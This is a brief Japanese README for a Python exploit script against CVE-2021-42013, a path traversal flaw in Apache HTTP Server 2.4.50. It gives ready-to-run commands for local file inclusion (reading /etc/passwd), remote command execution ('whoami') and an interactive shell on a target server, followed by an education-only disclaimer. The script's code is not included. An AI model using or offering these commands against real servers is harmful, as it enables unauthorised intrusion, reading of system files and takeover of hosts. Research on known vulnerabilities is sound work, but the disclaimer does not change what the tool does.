
CVE-2021-42013 - Apache 2.4.50
CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE 用のPython3スクリプトです。RCEにはcgi-binが有効である必要があります。
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
python3 apache_2.4.50.py -t http://apache.hack/ -shell
ヘルプメニューを表示するには:
python3 apache_2.4.50.py -h
このリポジトリで提供されるすべてのコードは、教育/研究目的のみを目的としています。このリポジトリに含まれるマテリアルに関連する行動や活動は、すべてユーザーの責任です。このリポジトリのコードを誤用すると、該当者に対して刑事告訴が行われる可能性があります。著者は、このリポジトリのコードを法律違反に悪用した個人に対して刑事告訴が行われた場合、一切の責任を負いません。